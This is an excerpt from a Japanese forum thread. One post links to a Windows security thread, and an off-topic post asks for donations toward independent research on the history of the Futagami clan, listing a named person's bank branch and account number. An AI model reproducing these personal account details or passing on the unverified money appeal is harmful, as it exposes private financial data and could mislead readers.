967窓板住人 ◆winDOwS0aE :03/01/23 12:39 ID:???
【Windows】セキュリティ情報総合スレッド 2
http://pc.2ch.net/test/read.cgi/pcnews/1043134572/l50
968
 二神一族の研究については、本格的な調査解明はこれから、10年、20年単位の研究になると思います。2000年NHKのビデオシリーズ
 歴史を学ぶ 1
  『海で結ばれた世界〜瀬戸内海・二神島〜』
  『海の民の歴史〜二神家の歴史を通して〜』
  『発掘調査の実験〜二神家墓地遺跡発掘現場にて〜』
など注目されましたが、もうひとつの二神の歴史を独自に調べようと思います。

二神一族の新しい歴史調査を独自にしたいと思っているのですが、資金面で問題がある為、寄付お願いします。

二神 麻奈美(ふたがみ まなみ)池田銀行名塩支店普通1623881